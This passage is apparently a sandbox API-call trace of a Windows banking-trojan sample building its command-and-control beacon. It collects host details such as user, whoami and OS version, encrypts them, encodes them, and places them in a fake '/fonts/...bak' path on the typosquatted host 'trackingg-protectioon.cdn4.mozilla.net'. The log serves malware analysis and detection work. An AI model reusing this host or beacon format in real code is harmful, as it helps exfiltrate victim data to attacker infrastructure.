param_2="&whoami=%s" | out: param_1="&whoami=kEecfMwgj@Q9IATRKPRH") returned 28 [0048.593] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0048.593] lstrlenA (lpString="trackingg-protectioon.cdn4.mozilla.net") returned 38 [0048.593] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x27) returned 0x2c59a68 [0048.593] memcpy (in: _Dst=0x2c59a68, _Src=0x2c59e18, _Size=0x26 | out: _Dst=0x2c59a68) returned 0x2c59a68 [0048.593] wsprintfA (in: param_1=0x2c5a5c3, param_2="&os=%s" | out: param_1="&os=6.1_1_7601_x64") returned 18 [0048.593] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5ad18 [0048.593] GetTickCount () returned 0x19f56ee [0048.593] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xa) returned 0x2c59b28 [0048.593] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x4) returned 0x2c59b40 [0048.593] lstrlenA (lpString="%s=%s&") returned 6 [0048.593] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x13) returned 0x2c59b50 [0048.595] sprintf (in: _Dest=0x2c59b50, _Format="%s=%s&" | out: _Dest="klt=ttghykqff&") returned 14 [0048.595] HeapFree (hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b40) [0048.595] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b40 | out: hHeap=0x2860000) returned 1 [0048.595] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0048.595] lstrlenA (lpString="klt=ttghykqff&") returned 14 [0048.595] lstrlenA (lpString="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27413&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 197 [0048.595] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xd4) returned 0x2c59b70 [0048.595] strcpy (in: _Dest=0x2c59b70, _Source="klt=ttghykqff&" | out: _Dest="klt=ttghykqff&") returned="klt=ttghykqff&" [0048.595] lstrcatA (in: lpString1="klt=ttghykqff&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27413&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" | out: lpString1="klt=ttghykqff&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27413&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned="klt=ttghykqff&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27413&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" [0048.595] lstrlenA (lpString="klt=ttghykqff&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=27413&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 211 [0048.595] GetProcAddress (hModule=0x75910000, lpProcName="CryptAcquireContextW") returned 0x7591df14 [0048.595] CryptAcquireContextW (in: phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x11ff064*=0x78c7c8) returned 1 [0048.596] memcpy (in: _Dst=0x11ff044, _Src=0x2c59df8, _Size=0x10 | out: _Dst=0x11ff044) returned 0x11ff044 [0048.597] GetProcAddress (hModule=0x75910000, lpProcName="CryptImportKey") returned 0x7591c532 [0048.597] CryptImportKey (in: hProv=0x78c7c8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070 | out: phKey=0x11ff070*=0x77d178) returned 1 [0048.599] GetProcAddress (hModule=0x75910000, lpProcName="CryptSetKeyParam") returned 0x759377b3 [0048.599] CryptSetKeyParam (hKey=0x77d178, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) returned 1 [0048.599] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xe0) returned 0x2c59c50 [0048.599] memcpy (in: _Dst=0x2c59c50, _Src=0x2c59b70, _Size=0x10 | out: _Dst=0x2c59c50) returned 0x2c59c50 [0048.599] GetProcAddress (hModule=0x75910000, lpProcName="CryptEncrypt") returned 0x7593779b [0048.599] CryptEncrypt (in: hKey=0x77d178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c50*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c50*, pdwDataLen=0x11ff074*=0x10) returned 1 [0048.600] memcpy (in: _Dst=0x2c59c60, _Src=0x2c59b80, _Size=0x10 | out: _Dst=0x2c59c60) returned 0x2c59c60 [0048.600] CryptEncrypt (in: hKey=0x77d178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c60*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c60*, pdwDataLen=0x11ff074*=0x10) returned 1 [0048.600] memcpy (in: _Dst=0x2c59c70, _Src=0x2c59b90, _Size=0x10 | out: _Dst=0x2c59c70) returned 0x2c59c70 [0048.600] CryptEncrypt (in: hKey=0x77d178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c70*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c70*, pdwDataLen=0x11ff074*=0x10) returned 1 [0048.600] memcpy (in: _Dst=0x2c59c80, _Src=0x2c59ba0, _Size=0x10 | out: _Dst=0x2c59c80) returned 0x2c59c80 [0048.600] CryptEncrypt (in: hKey=0x77d178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c80*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c80*, pdwDataLen=0x11ff074*=0x10) returned 1 [0048.600] memcpy (in: _Dst=0x2c59c90, _Src=0x2c59bb0, _Size=0x10 | out: _Dst=0x2c59c90) returned 0x2c59c90 [0048.600] CryptEncrypt (in: hKey=0x77d178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c90*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c90*, pdwDataLen=0x11ff074*=0x10) returned 1 [0048.600] memcpy (in: _Dst=0x2c59ca0, _Src=0x2c59bc0, _Size=0x10 | out: _Dst=0x2c59ca0) returned 0x2c59ca0 [0048.600] CryptEncrypt (in: hKey=0x77d178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ca0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ca0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0048.600] memcpy (in: _Dst=0x2c59cb0, _Src=0x2c59bd0, _Size=0x10 | out: _Dst=0x2c59cb0) returned 0x2c59cb0 [0048.600] CryptEncrypt (in: hKey=0x77d178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cb0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cb0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0048.600] memcpy (in: _Dst=0x2c59cc0, _Src=0x2c59be0, _Size=0x10 | out: _Dst=0x2c59cc0) returned 0x2c59cc0 [0048.600] CryptEncrypt (in: hKey=0x77d178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cc0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cc0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0048.600] memcpy (in: _Dst=0x2c59cd0, _Src=0x2c59bf0, _Size=0x10 | out: _Dst=0x2c59cd0) returned 0x2c59cd0 [0048.601] CryptEncrypt (in: hKey=0x77d178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cd0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cd0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0048.601] memcpy (in: _Dst=0x2c59ce0, _Src=0x2c59c00, _Size=0x10 | out: _Dst=0x2c59ce0) returned 0x2c59ce0 [0048.601] CryptEncrypt (in: hKey=0x77d178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ce0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ce0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0048.601] memcpy (in: _Dst=0x2c59cf0, _Src=0x2c59c10, _Size=0x10 | out: _Dst=0x2c59cf0) returned 0x2c59cf0 [0048.601] CryptEncrypt (in: hKey=0x77d178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cf0*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cf0*, pdwDataLen=0x11ff074*=0x10) returned 1 [0048.601] memcpy (in: _Dst=0x2c59d00, _Src=0x2c59c20, _Size=0x10 | out: _Dst=0x2c59d00) returned 0x2c59d00 [0048.601] CryptEncrypt (in: hKey=0x77d178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59d00*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59d00*, pdwDataLen=0x11ff074*=0x10) returned 1 [0048.601] memcpy (in: _Dst=0x2c59d10, _Src=0x2c59c30, _Size=0x10 | out: _Dst=0x2c59d10) returned 0x2c59d10 [0048.601] CryptEncrypt (in: hKey=0x77d178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59d10*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59d10*, pdwDataLen=0x11ff074*=0x10) returned 1 [0048.601] memcpy (in: _Dst=0x2c59d20, _Src=0x2c59c40, _Size=0x4 | out: _Dst=0x2c59d20) returned 0x2c59d20 [0048.601] CryptEncrypt (in: hKey=0x77d178, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2c59d20*, pdwDataLen=0x11ff074*=0x4, dwBufLen=0x20 | out: pbData=0x2c59d20*, pdwDataLen=0x11ff074*=0x10) returned 1 [0048.601] GetProcAddress (hModule=0x75910000, lpProcName="CryptDestroyKey") returned 0x7591c51a [0048.601] CryptDestroyKey (hKey=0x77d178) returned 1 [0048.601] GetProcAddress (hModule=0x75910000, lpProcName="CryptReleaseContext") returned 0x7591e124 [0048.601] CryptReleaseContext (hProv=0x78c7c8, dwFlags=0x0) returned 1 [0048.601] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1c0) returned 0x2c5b520 [0048.602] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c50 | out: hHeap=0x2860000) returned 1 [0048.602] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b70 | out: hHeap=0x2860000) returned 1 [0048.602] StrTrimA (in: psz="HW8zAOY4KqE+IBQxXqiK+gg1jsDn7Rscb8bpux3NVaRJ9pAMaxXxFteTQq43+ASePvZIygMHKthjz4l32r/ilmEbKRlryMUBmnQLa1DFW1jAZcAVzktnsV5lbctJi/jhVjxeAW8JTSWvnX/YajgKsukW+cCTfQoAIz6h2kZh3GH4hcdKudswJH+J5hwvJN8Dgk1FlfqiEpdBr3N9UHoDREEpetG+Dp+XIN/9Eaoun3dHQfmur59xnuKYrGslP6nXCrcwT9okpWrFTwIa7Tho+bO0+dGNglJPY9Xk/yqCTe+=", pszTrimChars="\r\n=" | out: psz="HW8zAOY4KqE+IBQxXqiK+gg1jsDn7Rscb8bpux3NVaRJ9pAMaxXxFteTQq43+ASePvZIygMHKthjz4l32r/ilmEbKRlryMUBmnQLa1DFW1jAZcAVzktnsV5lbctJi/jhVjxeAW8JTSWvnX/YajgKsukW+cCTfQoAIz6h2kZh3GH4hcdKudswJH+J5hwvJN8Dgk1FlfqiEpdBr3N9UHoDREEpetG+Dp+XIN/9Eaoun3dHQfmur59xnuKYrGslP6nXCrcwT9okpWrFTwIa7Tho+bO0+dGNglJPY9Xk/yqCTe+") returned 1 [0048.602] lstrlenA (lpString="HW8zAOY4KqE+IBQxXqiK+gg1jsDn7Rscb8bpux3NVaRJ9pAMaxXxFteTQq43+ASePvZIygMHKthjz4l32r/ilmEbKRlryMUBmnQLa1DFW1jAZcAVzktnsV5lbctJi/jhVjxeAW8JTSWvnX/YajgKsukW+cCTfQoAIz6h2kZh3GH4hcdKudswJH+J5hwvJN8Dgk1FlfqiEpdBr3N9UHoDREEpetG+Dp+XIN/9Eaoun3dHQfmur59xnuKYrGslP6nXCrcwT9okpWrFTwIa7Tho+bO0+dGNglJPY9Xk/yqCTe+") returned 299 [0048.602] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x382) returned 0x2c5b6e8 [0048.603] _snprintf (in: _Dest=0x2c5b6f3, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0048.603] _snprintf (in: _Dest=0x2c5b6fe, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0048.603] _snprintf (in: _Dest=0x2c5b728, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0048.603] _snprintf (in: _Dest=0x2c5b740, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0048.603] _snprintf (in: _Dest=0x2c5b76d, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0048.603] _snprintf (in: _Dest=0x2c5b780, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0048.603] _snprintf (in: _Dest=0x2c5b78c, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0048.603] _snprintf (in: _Dest=0x2c5b7ac, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0048.603] _snprintf (in: _Dest=0x2c5b7d3, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0048.603] _snprintf (in: _Dest=0x2c5b7d8, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0048.603] _snprintf (in: _Dest=0x2c5b7de, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0048.603] _snprintf (in: _Dest=0x2c5b812, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0048.603] _snprintf (in: _Dest=0x2c5b818, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0048.603] _snprintf (in: _Dest=0x2c5b826, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0048.604] _snprintf (in: _Dest=0x2c5b82e, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0048.605] HeapFree (hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b520) [0048.605] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b520 | out: hHeap=0x2860000) returned 1 [0048.605] lstrlenA (lpString="HW8zAOY4KqE_2BIBQxXqiK_2Bgg1jsDn7Rscb8bpux3NVaRJ9pAMaxXxFteTQq43_2BASePvZIygMHKthjz4l32r_2FilmEbKRlryMUBmnQLa1DFW1jAZcAVzktnsV5lbctJi_2FjhVjxeAW8JTSWvnX_2FYajgKsukW_2BcCTfQoAIz6h2kZh3GH4hcdKudswJH_2BJ5hwvJN8Dgk1FlfqiEpdBr3N9UHoDREEpetG_2BDp_2BXIN_2F9Eaoun3dHQfmur59xnuKYrGslP6nXCrcwT9okpWrFTwIa7Tho_2BbO0_2BdGNglJPY9Xk_2FyqCTe_2B") returned 329 [0048.605] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x173) returned 0x2c5b520 [0048.605] memcpy (in: _Dst=0x2c5b520, _Src=0x2c5b6e8, _Size=0x16 | out: _Dst=0x2c5b520) returned 0x2c5b520 [0048.605] memcpy (in: _Dst=0x2c5b537, _Src=0x2c5b6fe, _Size=0xd | out: _Dst=0x2c5b537) returned 0x2c5b537 [0048.605] memcpy (in: _Dst=0x2c5b545, _Src=0x2c5b70b, _Size=0x8 | out: _Dst=0x2c5b545) returned 0x2c5b545 [0048.605] memcpy (in: _Dst=0x2c5b54e, _Src=0x2c5b713, _Size=0x17 | out: _Dst=0x2c5b54e) returned 0x2c5b54e [0048.605] memcpy (in: _Dst=0x2c5b566, _Src=0x2c5b72a, _Size=0xa | out: _Dst=0x2c5b566) returned 0x2c5b566 [0048.605] memcpy (in: _Dst=0x2c5b571, _Src=0x2c5b734, _Size=0x11 | out: _Dst=0x2c5b571) returned 0x2c5b571 [0048.605] memcpy (in: _Dst=0x2c5b583, _Src=0x2c5b745, _Size=0xc | out: _Dst=0x2c5b583) returned 0x2c5b583 [0048.605] memcpy (in: _Dst=0x2c5b590, _Src=0x2c5b751, _Size=0xb | out: _Dst=0x2c5b590) returned 0x2c5b590 [0048.605] memcpy (in: _Dst=0x2c5b59c, _Src=0x2c5b75c, _Size=0xe | out: _Dst=0x2c5b59c) returned 0x2c5b59c [0048.605] memcpy (in: _Dst=0x2c5b5ab, _Src=0x2c5b76a, _Size=0x15 | out: _Dst=0x2c5b5ab) returned 0x2c5b5ab [0048.605] memcpy (in: _Dst=0x2c5b5c1, _Src=0x2c5b77f, _Size=0x10 | out: _Dst=0x2c5b5c1) returned 0x2c5b5c1 [0048.605] memcpy (in: _Dst=0x2c5b5d2, _Src=0x2c5b78f, _Size=0xf | out: _Dst=0x2c5b5d2) returned 0x2c5b5d2 [0048.605] memcpy (in: _Dst=0x2c5b5e2, _Src=0x2c5b79e, _Size=0x12 | out: _Dst=0x2c5b5e2) returned 0x2c5b5e2 [0048.605] memcpy (in: _Dst=0x2c5b5f5, _Src=0x2c5b7b0, _Size=0x9 | out: _Dst=0x2c5b5f5) returned 0x2c5b5f5 [0048.605] memcpy (in: _Dst=0x2c5b5ff, _Src=0x2c5b7b9, _Size=0x14 | out: _Dst=0x2c5b5ff) returned 0x2c5b5ff [0048.605] memcpy (in: _Dst=0x2c5b614, _Src=0x2c5b7cd, _Size=0x13 | out: _Dst=0x2c5b614) returned 0x2c5b614 [0048.605] memcpy (in: _Dst=0x2c5b628, _Src=0x2c5b7e0, _Size=0x16 | out: _Dst=0x2c5b628) returned 0x2c5b628 [0048.605] memcpy (in: _Dst=0x2c5b63f, _Src=0x2c5b7f6, _Size=0xd | out: _Dst=0x2c5b63f) returned 0x2c5b63f [0048.605] memcpy (in: _Dst=0x2c5b64d, _Src=0x2c5b803, _Size=0x8 | out: _Dst=0x2c5b64d) returned 0x2c5b64d [0048.605] memcpy (in: _Dst=0x2c5b656, _Src=0x2c5b80b, _Size=0x17 | out: _Dst=0x2c5b656) returned 0x2c5b656 [0048.605] memcpy (in: _Dst=0x2c5b66e, _Src=0x2c5b822, _Size=0x9 | out: _Dst=0x2c5b66e) returned 0x2c5b66e [0048.605] memcpy (in: _Dst=0x2c5b678, _Src=0x2c5b82b, _Size=0x7 | out: _Dst=0x2c5b678) returned 0x2c5b678 [0048.606] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b6e8 | out: hHeap=0x2860000) returned 1 [0048.606] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b50 | out: hHeap=0x2860000) returned 1 [0048.606] StrTrimA (in: psz="HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B", pszTrimChars="\r\n" | out: psz="HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B") returned 0 [0048.606] lstrlenA (lpString="/fonts/") returned 7 [0048.606] lstrlenA (lpString="HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B") returned 350 [0048.606] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x166) returned 0x2c59b28 [0048.606] lstrcpyA (in: lpString1=0x2c59b28, lpString2="/fonts/" | out: lpString1="/fonts/") returned="/fonts/" [0048.606] lstrcatA (in: lpString1="/fonts/", lpString2="HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B" | out: lpString1="/fonts/HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B") returned="/fonts/HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B" [0048.606] lstrcpyA (in: lpString1=0x2c5b520, lpString2=".bak" | out: lpString1=".bak") returned=".bak" [0048.606] lstrcpyA (in: lpString1=0x2c5ad18, lpString2="trackingg-protectioon.cdn4.mozilla.net" | out: lpString1="trackingg-protectioon.cdn4.mozilla.net") returned="trackingg-protectioon.cdn4.mozilla.net" [0048.606] lstrcatA (in: lpString1="trackingg-protectioon.cdn4.mozilla.net", lpString2="/fonts/HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B" | out: lpString1="trackingg-protectioon.cdn4.mozilla.net/fonts/HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B") returned="trackingg-protectioon.cdn4.mozilla.net/fonts/HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B" [0048.606] lstrcatA (in: lpString1="trackingg-protectioon.cdn4.mozilla.net/fonts/HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B", lpString2=".bak" | out: lpString1="trackingg-protectioon.cdn4.mozilla.net/fonts/HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B.bak") returned="trackingg-protectioon.cdn4.mozilla.net/fonts/HW8zAOY4KqE_2BIBQxXqiK/_2Bgg1jsDn7Rs/cb8bpux3/NVaRJ9pAMaxXxFteTQq43_2/BASePvZIyg/MHKthjz4l32r_2Fil/mEbKRlryMUBm/nQLa1DFW1jA/ZcAVzktnsV5lbc/tJi_2FjhVjxeAW8JTSWvn/X_2FYajgKsukW_2B/cCTfQoAIz6h2kZh/3GH4hcdKudswJH_2BJ/5hwvJN8Dg/k1FlfqiEpdBr3N9UHoDR/EEpetG_2BDp_2BXIN_2/F9Eaoun3dHQfmur59xnuKY/rGslP6nXCrcwT/9okpWrFT/wIa7Tho_2BbO0_2BdGNglJP/Y9Xk_2Fyq/CTe_2B.bak" [0048.606] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c4 [0048.606] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x1c8 [0048.606] lstrlenA 